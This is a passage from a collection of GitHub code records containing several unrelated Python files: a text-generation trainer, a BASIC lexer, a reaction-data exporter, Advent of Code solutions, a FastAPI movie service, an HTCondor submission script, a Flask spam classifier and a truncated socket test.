sentence.insert(0, \"pad\")\n sentence.insert(1, 'bos')\n if self.mode == \"train\":\n sentence.insert(len(sentence), 'eos')\n\n return sentence\n\n def preprocess(self, text: list) -> list:\n text = list(map(self.tokenize, text))\n text = list(sen for sen in text if sen)\n text = list(map(self.add_special_tokens, text))\n\n return text\n\n\nclass Classifier(nn.Module):\n def __init__(self, embedding_dim: int, hidden_dim: int, last_n: int, vocab_size: int) -> torch.tensor:\n super().__init__()\n self.embedding_dim = embedding_dim\n self.embedding_dim = embedding_dim\n self.last_n = last_n\n self.vocab_size = vocab_size\n\n self.context_linear = nn.Linear(embedding_dim, hidden_dim)\n self.last_n_linears = [nn.Linear(embedding_dim, hidden_dim)] * self.last_n\n self.global_linear = nn.Linear(hidden_dim * (self.last_n + 1), hidden_dim)\n self.classifier = nn.Linear(hidden_dim, self.vocab_size)\n\n def forward(self, context, last_n_embeddings) -> torch.tensor:\n context = context.float()\n last_n_embeddings = last_n_embeddings.float()\n\n x_context = [self.context_linear(context)]\n x_last_n = [self.last_n_linears[i](last_n_embeddings[i]) for i in range(self.last_n)]\n\n x = self.global_linear(torch.cat(x_context + x_last_n))\n probabilities = self.classifier(x)\n\n return probabilities\n\n\nclass Model(nn.Module):\n def __init__(self, word2vec: Word2Vec = None, loss_function: nn.Module = None, optimizer: Any = None,\n lr: float = 3e-4, device: torch.device = None, vocab: dict = None, vocab_size: int = None,\n embedding_dim: int = None, hidden_dim: int = None, last_n: int = None):\n super().__init__()\n self.new_state = None\n self.word2vec: Word2Vec = word2vec\n\n self.loss_function = loss_function\n self.lr = lr\n self.device = device\n\n self.classifier = Classifier(embedding_dim, hidden_dim, last_n, vocab_size)\n self.optimizer = optimizer(self.classifier.parameters(), lr=self.lr)\n\n self.vocab 
= vocab\n self.invert_vocab = {v: k for k, v in vocab.items()}\n\n self.vocab_size = vocab_size\n self.embedding_dim = embedding_dim\n self.last_n = last_n\n\n self.context: np.ndarray = np.zeros(self.embedding_dim)\n self.last_n_embeddings: np.ndarray = np.zeros((self.last_n, self.embedding_dim))\n self.current_seq_len: int = 0\n\n def get_embeddings(self, tokens: list) -> Tuple[torch.tensor, torch.tensor]:\n embeddings = self.word2vec.wv[tokens]\n self.last_n_embeddings = np.vstack([self.last_n_embeddings, embeddings])[-2:]\n self.new_state = np.mean(embeddings, axis=0)\n\n new_seq_len = len(tokens)\n whole_seq_len = self.current_seq_len + new_seq_len\n\n last_proportion = self.current_seq_len / whole_seq_len\n new_proportion = new_seq_len / whole_seq_len\n\n self.context = last_proportion * self.context + new_proportion * self.new_state\n\n return torch.from_numpy(self.context), torch.from_numpy(self.last_n_embeddings)\n\n def reset(self):\n self.context: np.ndarray = np.zeros(self.embedding_dim)\n self.last_n_embeddings: np.ndarray = np.zeros((self.last_n, self.embedding_dim))\n self.current_seq_len: int = 0\n\n def train_epoch(self, model, optimizer, loss_function: object, device, vocab, lines):\n model.to(device)\n model.train()\n\n epoch_loss = 0.0\n lines_len = len(lines)\n vocab_size = len(list(vocab.keys()))\n\n for line in tqdm(lines):\n seq_len = len(line)\n split_index = seq_len // 2\n input = line[:split_index]\n\n sentence_loss = 0.0\n for i in range(split_index, seq_len - 1):\n context, last_n_embeddings = self.get_embeddings(input)\n context, last_n_embeddings = context.to(device), last_n_embeddings.to(\n device\n )\n output = model(context, last_n_embeddings)\n\n target = torch.zeros(vocab_size)\n target_id = torch.tensor([vocab.get(line[i])])\n target[target_id] = 1\n target, output = target.unsqueeze(0), output.unsqueeze(0)\n loss = loss_function(output, target)\n sentence_loss += loss.item()\n loss.backward()\n optimizer.step()\n optimizer.zero_grad()\n\n sentence_loss /= seq_len // 2 - 1\n epoch_loss += sentence_loss\n self.reset()\n\n epoch_loss /= lines_len\n return epoch_loss\n\n def eval_epoch(self, model, loss_function, device, vocab, lines):\n model.to(device)\n model.eval()\n\n lines_len = len(lines)\n epoch_loss = 0.0\n vocab_size = len(list(vocab.keys()))\n for line in tqdm(lines):\n seq_len = len(line)\n split_index = seq_len // 2\n input = line[:split_index]\n\n sentence_loss = 0.0\n for i in range(split_index, seq_len - 1):\n context, last_n_embeddings = self.get_embeddings(input)\n context, last_n_embeddings = context.to(device), last_n_embeddings.to(\n device\n )\n with torch.no_grad():\n output = model(context, last_n_embeddings)\n\n target = torch.zeros(vocab_size)\n target_id = torch.tensor([vocab.get(line[i])])\n target[target_id] = 1\n target, output = target.unsqueeze(0), output.unsqueeze(0)\n loss = loss_function(output, target)\n sentence_loss += loss.item()\n\n sentence_loss /= seq_len // 2 - 1\n epoch_loss += sentence_loss\n self.reset()\n\n epoch_loss /= lines_len\n return epoch_loss\n\n def fit(self, text, eval_percent: float = 0.2):\n total_examples = len(text)\n split_int = int(total_examples * (1 - eval_percent))\n\n train_loss = self.train_epoch(\n model=self.classifier,\n lines=text[:split_int],\n loss_function=self.loss_function,\n device=self.device,\n vocab=self.vocab,\n optimizer=self.optimizer\n )\n print(\"Train Loss:\", train_loss)\n\n eval_loss = self.eval_epoch(\n model=self.classifier,\n lines=text[split_int:],\n 
loss_function=self.loss_function,\n device=self.device,\n vocab=self.vocab,\n )\n\n print(\"Eval Loss:\", eval_loss)\n\n def generate(self, tokens, seq_len) -> str:\n if tokens is None:\n tokens = ['pad', 'bos']\n tokens += [self.invert_vocab[random.randint(0, self.vocab_size - 1)]]\n\n context, last_n_embeddings = self.get_embdeddings(tokens)\n for i in range(seq_len):\n probabilities = self.classifier(context, last_n_embeddings).softmax(0)\n probabilities, indices = torch.sort(probabilities)\n j = -1\n id = indices[j].item()\n word = self.invert_vocab[id]\n while word in tokens:\n j -= 1\n id = indices[j].items()\n word = self.invert_vocab[id]\n\n tokens += [word]\n context, last_n_embeddings = self.get_embeddings([word])\n return ''.join(tokens)\n else:\n\n context, last_n_embeddings = self.get_embeddings(np.reshape(tokens, -1))\n tokens = list(np.reshape(tokens, -1))\n for i in range(seq_len):\n ids = torch.topk(self.classifier(context, last_n_embeddings), 20).indices.numpy()\n id = np.random.choice(ids)\n word = self.invert_vocab[id]\n tokens += [word]\n context, last_n_embeddings = self.get_embeddings([word])\n return tokens[2:]\n\n def save_model(self, path: str) -> None:\n if not path.endswith(\"pkl\"):\n raise ValueError('Model extension must be .pkl')\n\n with open(f'{path}', 'wb') as f:\n pickle.dump(self, file=f)\n\n @staticmethod\n def load_model(path: str) -> \"Model\":\n if not path.endswith(\"pkl\"):\n raise ValueError(\"Model extension must be .pkl\")\n\n with open(path, \"rb\") as f:\n model = pickle.load(file=f)\n\n return model\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Training')\n parser.add_argument('--input-dir', type=str, help='Data directory path')\n parser.add_argument('--model', type=str, help='Model save path')\n arguments = parser.parse_args()\n VECTOR_SIZE = 32\n preprocessor = Preprocessor(mode=\"train\")\n if arguments.input_dir:\n for file in os.listdir(arguments.input_dir):\n with open(f\"{arguments.input_dir}/{file}\", \"r\") as f:\n text = f.readlines()\n preprocessed_text = preprocessor.preprocess(text)[:15000]\n else:\n text = input().split(\"\\n\")\n preprocessed_text = preprocessor.preprocess(text)[:15000]\n\n word2vec = Word2Vec(sentences=preprocessed_text, vector_size=VECTOR_SIZE, min_count=1, sg=1)\n word2vec.train(preprocessed_text, total_examples=len(preprocessed_text), epochs=20)\n\n vocab = word2vec.wv.key_to_index\n vocab_size = len(list(vocab.keys()))\n\n model = Model(\n word2vec=word2vec,\n loss_function=nn.CrossEntropyLoss(),\n optimizer=torch.optim.Adam,\n lr=0.01,\n device=torch.device(\"cpu\"),\n embedding_dim=VECTOR_SIZE,\n hidden_dim=VECTOR_SIZE,\n last_n=2,\n vocab=vocab,\n vocab_size=vocab_size,\n )\n\n model.fit(preprocessed_text)\n\n model.save_model(arguments.model)\n","repo_name":"AndreyML/tinkoff_text_generation","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10518,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"70170308241","text":"import re\nfrom token import Token\n\ndef find_max_match(text, regex_dict):\n max_token_name, max_end_index = None, 0\n\n for token_name, regex in regex_dict.items():\n submatch = regex.match(text)\n if submatch and submatch.span()[1] > max_end_index:\n max_end_index = submatch.span()[1]\n max_token_name = token_name\n\n return max_token_name, max_end_index\n\nclass Lexer:\n def __init__(self, input_text):\n self.input_text = input_text\n self.tokens = {\n 
'COMMENT': 'REM\\W.*?\\\\n',\n 'FOR': 'FOR',\n 'NEXT': 'NEXT',\n 'IDENT': '[a-zA-Z_][a-zA-Z]*[%$#&!]?',\n 'OPERATIONS': '[+\\\\-\\\\/\\\\\\\\]'\n }\n self.tokens_compiled = {k: re.compile(v) for k, v in self.tokens.items()}\n self.pattern = re.compile('|'.join(f'({v})' for v in self.tokens.values()))\n self.spaces = re.compile('\\s+')\n\n def tokenize(self):\n line = 1\n line_index = -1\n current_index = -1\n\n while current_index < len(self.input_text) - 1:\n current_index += 1\n line_index += 1\n char = self.input_text[current_index]\n\n # Пропустить пробелы и переносы строк\n if char in (' ', '\\t'):\n continue\n elif char == '\\n':\n line += 1\n line_index = -1\n continue\n\n text = self.input_text[current_index:]\n\n max_token_name, max_end_index = find_max_match(text, self.tokens_compiled)\n\n if max_token_name:\n yield Token(\n max_token_name, (line, line_index), text[:max_end_index]\n )\n current_index += max_end_index - 1\n line_index += max_end_index - 1\n else:\n print(f\"Syntax error at line {line}, index {line_index}\")\n","repo_name":"PROCENTX123/Compilers","sub_path":"compil1.2/lexer.py","file_name":"lexer.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19270681821","text":"import glob\nimport json\nimport os.path\nfrom typing import TypedDict\n\nfrom loguru import logger\nfrom ord_schema.message_helpers import json_format\nfrom ord_schema.message_helpers import load_message\nfrom ord_schema.proto.dataset_pb2 import Dataset\nfrom ord_schema.proto.reaction_pb2 import Reaction\nfrom tqdm import tqdm\n\n\"\"\"\nfiled name in the output of `protobuf.json_format` is by default camel case\nuse `json_format.MessageToJson(r, preserving_proto_field_name=True)` to output unmodified keys\n\"\"\"\n\n\nclass LData(TypedDict):\n notes__procedureDetails: str # for prompt\n conditions: dict\n reaction_id: str\n inputs: dict[str, dict]\n outcomes: list[dict]\n workups: list[dict]\n warning_messages: list[str]\n\n\nclass LDataExportError(Exception): pass\n\n\ndef clean_compound(compound: dict, msg_prefix: str = \"\") -> list[str]:\n w_msgs = []\n\n # 1. remove non-name identifiers\n identifiers = compound['identifiers']\n new_identifiers = []\n for ii in identifiers:\n if ii['type'].upper() != 'NAME':\n continue\n else:\n new_identifiers.append(ii)\n break\n assert len(new_identifiers) <= 1\n if len(new_identifiers) == 0:\n msg = f\"no name found in compound identifiers: {identifiers}\"\n w_msgs.append(msg)\n else:\n compound['identifiers'] = new_identifiers\n\n # 2. remove invalid amounts\n if 'amount' in compound:\n remove_amount = False\n for kk, vv in compound['amount'].items():\n if not (isinstance(vv, dict) and 'value' in vv):\n continue\n if vv['value'] == 0:\n msg = f\"compound amount invalid, the amount will be removed: {compound}\"\n # raise LDataExportError(msg)\n w_msgs.append(msg)\n remove_amount = True\n break\n if remove_amount:\n compound.pop('amount', None)\n return [msg_prefix + \": \" + m for m in w_msgs]\n\n\ndef reaction_to_llm_data(r: Reaction):\n logger.info(f\"converting reaction: {r.reaction_id}\")\n w_msgs = []\n\n rdict = json_format.MessageToDict(r)\n\n r_key = 'inputs'\n if r_key not in rdict:\n msg = f\"r_key missing: {r_key}\"\n w_msgs.append(msg)\n r_inputs = dict()\n else:\n r_inputs = rdict[r_key]\n for k, v in r_inputs.items():\n try:\n components = v['components']\n except KeyError:\n # possible if the input is represented by crude_components, ex. 
ord-7c920412f21b4b8195d3bf450f022cbd\n # exclude them for now\n raise LDataExportError(\"cannot find components in reaction.inputs!\")\n for ic, c in enumerate(components):\n w_msgs += clean_compound(c, f\"inputs.[{k}].[{ic}]\")\n\n r_key = 'workups'\n if r_key not in rdict:\n # msg = f\"r_key missing: {r_key}\" # this can be absent\n # w_msgs.append(msg)\n r_workups = []\n else:\n r_workups = rdict[r_key]\n for w in r_workups:\n try:\n workup_input = w['input']\n components = workup_input['components']\n except KeyError:\n continue\n for ic, c in enumerate(components):\n w_msgs += clean_compound(c, f\"workups.components.[{ic}]\")\n\n r_key = 'outcomes'\n if r_key not in rdict:\n msg = f\"r_key missing: {r_key}\"\n w_msgs.append(msg)\n r_outcomes = []\n else:\n r_outcomes = rdict[r_key]\n for outcome in r_outcomes:\n try:\n products = outcome['products']\n except KeyError:\n raise LDataExportError(\"no products in outcome!\")\n for ic, c in enumerate(products):\n w_msgs += clean_compound(c, f\"outcomes.products.[{ic}]\")\n\n try:\n prompt = rdict['notes']['procedureDetails']\n except KeyError:\n raise LDataExportError(\"no input text!\")\n\n ldict = LData(\n notes__procedureDetails=prompt,\n conditions=rdict['conditions'],\n reaction_id=rdict['reactionId'],\n inputs=r_inputs,\n outcomes=r_outcomes,\n workups=r_workups,\n warning_messages=w_msgs,\n )\n return ldict\n\n\ndef convert_datasets(\n output_data_dir=\"data_from_pb_no_warning\",\n local_data_folder=\"/home/qai/workplace/ord-data/data\",\n uspto_only=True,\n keep_only_no_warning=True,\n):\n dataset_files = sorted(glob.glob(f\"{local_data_folder}/*/*.pb.gz\"))\n logger.info(f\"# of dataset files: {len(dataset_files)}\")\n for f in tqdm(dataset_files):\n logger.info(f\"convert dataset file: {f}\")\n dataset = load_message(f, Dataset)\n if uspto_only and \"uspto-grants-\" not in dataset.name.lower():\n logger.critical(f\"skipping non-USPTO dataset: {dataset.name}\")\n output_file = f\"{output_data_dir}/{dataset.dataset_id}.json\"\n if os.path.isfile(output_file) and os.path.getsize(output_file) > 0:\n logger.info(\"output already exists, skipping conversion...\")\n continue\n lds = []\n for r in dataset.reactions:\n try:\n ld = reaction_to_llm_data(r)\n except LDataExportError as e:\n logger.critical(f\"excluding reaction: {r.reaction_id}\\ndue to:{e}\")\n continue\n if keep_only_no_warning and len(ld['warning_messages']) > 0:\n logger.critical(f\"excluding reaction: {r.reaction_id}\\ndue to warning msgs: {ld['warning_messages']}\")\n continue\n lds.append(ld)\n with open(output_file, 'w') as output_fp:\n json.dump(lds, output_fp, indent=2)\n\n\nif __name__ == '__main__':\n logger.remove(0)\n logger.add(__file__.replace(\".py\", \".log\"))\n convert_datasets(keep_only_no_warning=True)\n # 190764 reactions 515 datasets\n","repo_name":"qai222/LLM_organic_synthesis","sub_path":"ord_data/export_from_pb.py","file_name":"export_from_pb.py","file_ext":"py","file_size_in_byte":5856,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"3"} +{"seq_id":"18469422288","text":"#Advent of Code 22a\n# Sporifica Virus\n\n#import numpy as np\n\n\nimport time\nstart_time = time.time()\nprint('Fractal Art')\n#file = open('inputTest.txt','r')\nfile = open('input22.txt','r')\ninput = file.read().split('\\n')\nfile.close()\n\n\nprint(input) \n\n#pattern = []\n#for line in input:\n \n#pattern.append('..#')\n#pattern.append('#..')\n#pattern.append('...')\n\ndirections = ['UP','RIGHT','DOWN','LEFT']\ndirectionIndex = 0 
#start heading up\n\ninfectedNodes = []\nfor yPos in range( 0, len(input) ):\n for xPos in range( 0, len(input) ):\n if input[yPos][xPos] == '#':\n infectedNodes.append( [xPos,yPos] )\n\nprint(len(infectedNodes) )\nprint( infectedNodes)\n\ndef detectInfected( inputX, inputY ):\n for node in infectedNodes:\n if node == [inputX,inputY]:\n return True\n return False\n\ndef removeInfected( inputX, inputY ):\n for node in infectedNodes:\n if node == [inputX,inputY]:\n #print('found the node to remove')\n infectedNodes.remove(node)\n return\n\ndef turnLeft():\n global directionIndex\n directionIndex -= 1\n if directionIndex < 0:\n directionIndex = 3\n\ndef turnRight():\n global directionIndex\n directionIndex +=1\n if directionIndex > 3:\n directionIndex = 0\n\n#test for sample input\ndef test():\n #check positive detection\n if detectInfected( 2,0 ) and detectInfected( 0,1 ):\n pass\n else:\n print('detectInfected failed')\n return False\n\n if detectInfected( 0,0) or detectInfected( 2,1 ) or detectInfected(2,2):\n print('detectInfected false positive')\n return False\n\n return True\n\nxPos = 12\nyPos = 12\n\n#occurances of infectinos\ninfections = 0\n\nbursts = 10000\nfor x in range(0,bursts):\n #if we are on an infected node disinfect and turn right.\n if detectInfected( xPos, yPos ):\n removeInfected( xPos, yPos )\n turnRight()\n #if we are on a disinfected node, infect and turn left.\n else:\n infectedNodes.append( [xPos,yPos] )\n infections += 1\n turnLeft()\n \n #move forward\n direction = directions[directionIndex]\n if direction == 'UP':\n #print('moving up')\n yPos -= 1\n elif direction == 'LEFT':\n #print('moving left')\n xPos -= 1\n elif direction == 'DOWN':\n #print('moving down')\n yPos += 1\n elif direction == 'RIGHT':\n #print('moving right')\n xPos += 1\n\n #print( 'New Position: ' + str(xPos) + ' ' + str(yPos) )\n\n\n#print( 'Test results = ' + str( test() ) )\n\nprint(time.time() - start_time )\n\nprint( 'Burts : ' + str(bursts) )\n\nprint( 'infection count: ' + str( len( infectedNodes ) ) )\nprint( 'occurences of infection: ' + str( infections ) )\n#print( infectedNodes )\nprint( xPos ,yPos )\n\n\n\n\n\n \n \n \n\n\n\n\n","repo_name":"Jamibaraki/adventOfCode2017","sub_path":"day22a.py","file_name":"day22a.py","file_ext":"py","file_size_in_byte":2794,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"29231961648","text":"#!/usr/bin/env python3\nimport numpy as np\nimport re\n\npattern = re.compile(r'#(\\d+) @ (\\d+),(\\d+): (\\d+)x(\\d+)')\n\nwith open('03.txt') as infile:\n inputs = infile.read().splitlines()\n\n# Part 1\ncounts = np.zeros([1000, 1000], dtype=int)\nfor line in inputs:\n m = pattern.match(line)\n i, x, y, w, h = [int(x) for x in m.groups()]\n counts[y:y+h, x:x+w] += 1\n\nprint('Squares overlapping', np.sum((counts > 1)))\n\n# Part2\nfor line in inputs:\n m = pattern.match(line)\n i, x, y, w, h = [int(x) for x in m.groups()]\n if np.all(counts[y:y+h, x:x+w] == 1):\n print('Non-overlapping id', i)\n","repo_name":"stianse/advent-of-code-2018","sub_path":"03.py","file_name":"03.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73845082000","text":"import sys\n\nsys.dont_write_bytecode = True\nfrom utils import *\n\npuzzle = open('puzzle/05.in').read()\n\nraw_stacks, instructions = puzzle.split('\\n\\n')\n*raw_stacks, indexes = raw_stacks.splitlines()\nstacks_1 = {}\nfor line in raw_stacks:\n for idx, 
char in zip(indexes, line):\n if idx != ' ' and char != ' ':\n idx = int(idx)\n if idx not in stacks_1:\n stacks_1[idx] = []\n stacks_1[idx].insert(0, char)\nstacks_2 = deepcopy(stacks_1)\n\nfor instruction in instructions.splitlines():\n n, fr, to = get_ints(instruction)\n stacks_1[to].extend(reversed(stacks_1[fr][-n:]))\n del stacks_1[fr][-n:]\n stacks_2[to].extend(stacks_2[fr][-n:])\n del stacks_2[fr][-n:]\n\ntime_print(''.join(v[-1] for _, v in sorted(stacks_1.items()) if v))\ntime_print(''.join(v[-1] for _, v in sorted(stacks_2.items()) if v))\n","repo_name":"filipmlynarski/Advent-of-Code","sub_path":"2022/05.py","file_name":"05.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"41001281850","text":"from fastapi import FastAPI,Depends\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom sqlalchemy.orm import Session, sessionmaker\nfrom schema import ProductionBase, Production, Staff, StaffBase, Genre, GenreBase, MovieId, Movie, Visualize, UserBase, MovieBase\nfrom sqlalchemy import create_engine\nfrom dotenv import load_dotenv\nfrom typing import List\nfrom . import controller as ctrl \nimport os \n\nload_dotenv()\n\nMYSQL_DATABASE_URL = os.getenv('MYSQL_DATABASE_URL')\n\nengine = create_engine(MYSQL_DATABASE_URL)\nSessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine)\n\napp=FastAPI()\norigins = [\"*\"]\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\ndef get_db():\n db = SessionLocal()\n try:\n yield db\n finally:\n db.close()\n\n@app.get(\"/production\", tags=[\"production\"])\ndef get_production(production:int, db:Session=Depends(get_db)):\n result = ctrl.get_production(ProductionBase(uid=production),db)\n db.close()\n return result\n\n@app.get(\"/production/all\", tags=[\"production\"])\ndef get_productions(db:Session=Depends(get_db)):\n result = ctrl.get_all_productions(db)\n db.close()\n return result\n\n@app.post(\"/production\", tags=[\"production\"])\ndef create_production(production: Production,db: Session = Depends(get_db)):\n result = ctrl.create_production(production, db)\n db.close()\n return result\n\n@app.post(\"/production/multiple\", tags=[\"production\"])\ndef create_productions(productions: List[Production], db:Session=Depends(get_db)):\n result = ctrl.create_productions(productions, db)\n db.close()\n return result\n\n@app.delete(\"/production\", tags=[\"production\"])\ndef delete_production(production:ProductionBase, db: Session= Depends(get_db)):\n ctrl.delete_production(production, db)\n db.close()\n \n\n@app.patch(\"/production\", tags=[\"production\"])\ndef update_production(production: Production, db:Session=Depends(get_db)):\n ctrl.update_production(production, db)\n db.close()\n\n@app.get(\"/staff\", tags=[\"staff\"])\ndef get_staff(uid:int, db:Session=Depends(get_db)):\n result = ctrl.get_staff(StaffBase(uid=uid),db)\n db.close()\n return result\n\n@app.get(\"/staff/all\", tags=[\"staff\"])\ndef get_staff(db:Session=Depends(get_db)):\n result = ctrl.get_all_staffs(db)\n db.close()\n return result\n\n@app.post(\"/staff\", tags=[\"staff\"])\ndef create_staff(staff: Staff,db: Session = Depends(get_db)):\n result = ctrl.create_staff(staff, db)\n db.close()\n return result\n\n@app.post(\"/staff/multiple\", tags=[\"staff\"])\ndef create_staffs(staffs: List[Staff], db:Session=Depends(get_db)):\n result = ctrl.create_staffs(staffs, db)\n 
db.close()\n return result\n\n@app.delete(\"/staff\", tags=[\"staff\"])\ndef delete_staff(staffs:StaffBase, db: Session= Depends(get_db)):\n ctrl.delete_staff(staffs, db)\n db.close()\n \n\n@app.patch(\"/staff\", tags=[\"staff\"])\ndef update_staff(staff: Staff, db:Session=Depends(get_db)):\n ctrl.update_staff(staff, db)\n db.close()\n@app.get(\"/genre\", tags=[\"genre\"])\ndef get_genre(genre:int, db:Session=Depends(get_db)):\n result = ctrl.get_genre(GenreBase(uid=genre),db)\n db.close()\n return result\n\n@app.get(\"/genre/all\", tags=[\"genre\"])\ndef get_genres(db:Session=Depends(get_db)):\n result = ctrl.get_all_genres(db)\n db.close()\n return result\n\n@app.post(\"/genre\", tags=[\"genre\"])\ndef create_genre(genre: Genre,db: Session = Depends(get_db)):\n result = ctrl.create_genre(genre, db)\n db.close()\n return result\n\n@app.post(\"/genre/multiple\", tags=[\"genre\"])\ndef create_genres(genres: List[Genre], db:Session=Depends(get_db)):\n result = ctrl.create_genres(genres, db)\n db.close()\n return result\n\n@app.delete(\"/genre\", tags=[\"genre\"])\ndef delete_genre(genre:GenreBase, db: Session= Depends(get_db)):\n ctrl.delete_genre(genre, db)\n db.close()\n \n\n@app.patch(\"/genre\", tags=[\"genre\"])\ndef update_genre(genre: Genre, db:Session=Depends(get_db)):\n ctrl.update_genre(genre, db)\n db.close()\n\n@app.get(\"/movie\", tags=[\"movie\"])\ndef get_movie(uid:int, db:Session=Depends(get_db)):\n result = ctrl.get_movie(MovieId(uid=uid),db)\n db.close()\n return result\n\n@app.get(\"/movie/title\", tags=[\"movie\"])\ndef get_movie_by_title(title:str, db:Session=Depends(get_db)):\n result = ctrl.get_movie_by_title(MovieBase(title=title),db)\n db.close()\n return result\n\n@app.get(\"/movie/all\", tags=[\"movie\"])\ndef get_movie(db:Session=Depends(get_db)):\n result = ctrl.get_all_movies(db)\n db.close()\n return result\n\n@app.post(\"/movie\", tags=[\"movie\"])\ndef create_movie(movie: Movie,db: Session = Depends(get_db)):\n result = ctrl.create_movie(movie, db)\n db.close()\n return result\n\n@app.delete(\"/movie\", tags=[\"movie\"])\ndef delete_movie(movie:MovieId, db: Session= Depends(get_db)):\n ctrl.delete_movie(movie, db)\n db.close()\n\n@app.patch(\"/movie\", tags=[\"movie\"])\ndef update_movie(movie:Movie, db:Session=Depends(get_db)):\n ctrl.update_movie(movie, db)\n db.close()\n\n@app.get(\"/movie/random\", tags=[\"movie\"])\ndef get_random_movies(db:Session=Depends(get_db)):\n result= ctrl.get_random_movies(db)\n db.close()\n return result\n@app.post(\"/watch\", tags=[\"watch\"])\ndef create_visualize_relationship(relations: List[Visualize],db: Session= Depends(get_db)):\n result = ctrl.create_visualize_relation(relations,db)\n db.close()\n return result\n\n@app.get(\"/watch/all\", tags=[\"watch\"])\ndef get_movies_seen_by_user(uid:int, db:Session= Depends(get_db)):\n result = ctrl.get_movies_seen_by_user(uid,db)\n db.close()\n return result\n\n@app.delete(\"/watch\", tags=[\"watch\"])\ndef delete_visualize_relationship(relation:Visualize,db:Session=Depends(get_db)):\n ctrl.delete_visualize_relation(relation,db)\n db.close()\n\n@app.patch(\"/watch\", tags=[\"watch\"])\ndef update_visualize_relationship(new_relation:Visualize,old_relation:Visualize,db:Session=Depends(get_db)):\n ctrl.update_visualize_relation(new_relation=new_relation, old_relation=old_relation,db=db)\n db.close()\n \n@app.post(\"/watch/group\", tags=[\"watch\"])\ndef get_movies_seen_by_group(users: List[UserBase], db:Session= Depends(get_db)):\n result = ctrl.get_movies_seen_by_group(users,db)\n 
db.close()\n return result","repo_name":"Hiruurouge/WatchOurMovie","sub_path":"movie-service/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"2949311266","text":"#!/usr/bin/env python\nimport os, sys\nimport subprocess\n\nopts = {}\nsim = '100'\nopts[\"root\"] = '/data/p-one/mirosant/sim_10tev-10pev/'\nopts[\"out\"] = '/data/p-one/mirosant/sim_10tev-10pev/'+sim+'/Propfiles'\nopts[\"job\"] = '/data/p-one/mirosant/sim_10tev-10pev/jobfiles'\nopts[\"in\"] = '/data/p-one/mirosant/sim_10tev-10pev/Genfiles'\n\nprocessfilename = 'prop_sub'\nsubmissionfilename = 'prop_sub.submit'\n\njob_string = '''#!/bin/bash\n\nbash /data/p-one/mirosant/pone_offline/env-shell_Container.sh python {}/PropogatePhotons.py -i {} -o {} -r $1 -g {}\n\n'''.format(opts[\"root\"]+\"Eventfiles\",\n opts[\"in\"]+\"/gen_\",\n opts[\"out\"]+\"/prop_\",\n \"/data/p-one/mirosant/pone_offline/GCD/PONE_10spacing100.0String.i3.gz\")\n\nwith open(opts[\"job\"] + \"/\" + processfilename + '.sh', 'w') as ofile:\n ofile.write(job_string)\n subprocess.Popen(['chmod','777',opts[\"job\"] + \"/\" + processfilename + '.sh'])\n\nsubmit_string = '''\nexecutable = {}/{}\n\nArguments = $(Item)\noutput = {}_$(Item).out\nerror = {}_$(Item).err\nlog = {}_$(Item).log\n\n+SingularityImage = \"/data/p-one/icetray_offline.sif\"\n\nUniverse = vanilla\nrequest_memory = 4GB\nrequest_cpus = 1\nrequest_gpus = 1\nrequirements = HasSingularity\nrequirements = CUDADeviceName == \"NVIDIA TITAN Xp\"\n\nnotification = never\n\n+TransferOutput=\"\"\n\nqueue from seq {} {} |\n'''.format(opts[\"job\"],\n processfilename + '.sh',\n opts[\"root\"]+\"/logfiles/\"+processfilename,\n opts[\"root\"]+\"/logfiles/\"+processfilename,\n opts[\"root\"]+\"/logfiles/\"+processfilename,\n 1,100)\n\nwith open(opts[\"job\"] + '/' + submissionfilename, 'w') as ofile:\n ofile.write(submit_string)\n\nsubmit = subprocess.Popen(['condor_submit',opts[\"job\"] + '/' + submissionfilename])\n","repo_name":"MiroSant/P-ONE","sub_path":"Simulations/10_tev-10pev/jobfiles/submit_prop.py","file_name":"submit_prop.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6900240623","text":"from flask import Flask, request, jsonify\nfrom flask_cors import CORS\nfrom collections import Counter\nimport jieba\nimport joblib\n\njieba.initialize()\nclf = joblib.load(\"./models/Bayes_sklearn.pkl\")\nvsm = joblib.load(\"./models/vsm.pkl\")\n\n\napp = Flask(__name__)\ncors = CORS(app)\n\n\ndef check_spam(text: str):\n data = [text]\n data = [jieba.lcut(x) for x in data]\n data = [Counter(d) for d in data]\n x = vsm.transform(data)\n predicted = clf.predict(x)\n return predicted[0] == 1\n\n\n@app.route(\"/predict\", methods=[\"POST\"])\ndef predict():\n req = request.get_json()\n text = req[\"text\"]\n v = check_spam(text)\n return jsonify({\"predict\": bool(v)})\n\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"yuchenyang1994/spam_helper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"12057705063","text":"import asyncio\nimport pytest\n\nfrom ..tcp_socket_receiver import Receiver\n\n@pytest.mark.asyncio\nasync def test_tcp_socket_receiver():\n\n async with Receiver() as r:\n print(\"Listening on port %d\" % r.port)\n 
